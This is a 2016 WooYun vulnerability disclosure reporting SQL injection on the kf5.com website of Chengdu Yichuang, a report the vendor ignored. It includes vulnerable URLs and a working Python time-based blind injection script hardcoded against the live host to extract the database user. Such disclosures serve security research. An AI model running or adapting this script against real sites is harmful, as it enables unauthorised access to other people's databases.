当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0173198

漏洞标题:成都逸创WWW主站多处存在SQL注入漏洞(打包提交/附脚本)

相关厂商:成都逸创

漏洞作者: 路人甲

提交时间:2016-01-27 22:08

修复时间:2016-02-01 22:10

公开时间:2016-02-01 22:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-27: 细节已通知厂商并且等待厂商处理中
2016-02-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

成都逸创WWW主站多处存在SQL注入漏洞

详细说明:

成都逸创WWW主站多处存在SQL注入漏洞,一起提交了!存在漏洞的URL:

http://www.kf5.com/resources/index?id=2


http://www.kf5.com/resources/view/id/60/


http://www.kf5.com/resources/index/id/2


http://www.kf5.com/resources/view?id=60/


...可能其他地方还有吧...


首先来看,报错

kf_0.png


基本断定注入是存在的。但服务器好像有防火墙,就没用sqlmap
先手动获取user的长度为16

kf_1.png


之后用脚本跑出user

kf_2.png

漏洞证明:

kf_2.png


附脚本:

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
import math
headers = {}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print 'Start to retrive MySQL User:'
user= ''
for i in range(1, 17):
for payload in payloads:
s = "/resources/view?id=if(now()=sysdate(),SLEEP(IF(ascii(mid(user(),%s,1))=%
s,10,0)),0)" % (i, ord(payload))
conn = httplib.HTTPConnection('www.kf5.com', timeout=150)
conn.request(method='GET',
url=s,
headers=headers)
start_time = time.time()
conn.getresponse()
conn.close()
print '.',
if time.time() - start_time > 10.0:
user += payload
print '\n\n[in progress]', user,
break
print '\n\n[Done] MySQL User is %s' % user

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-01 22:10

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无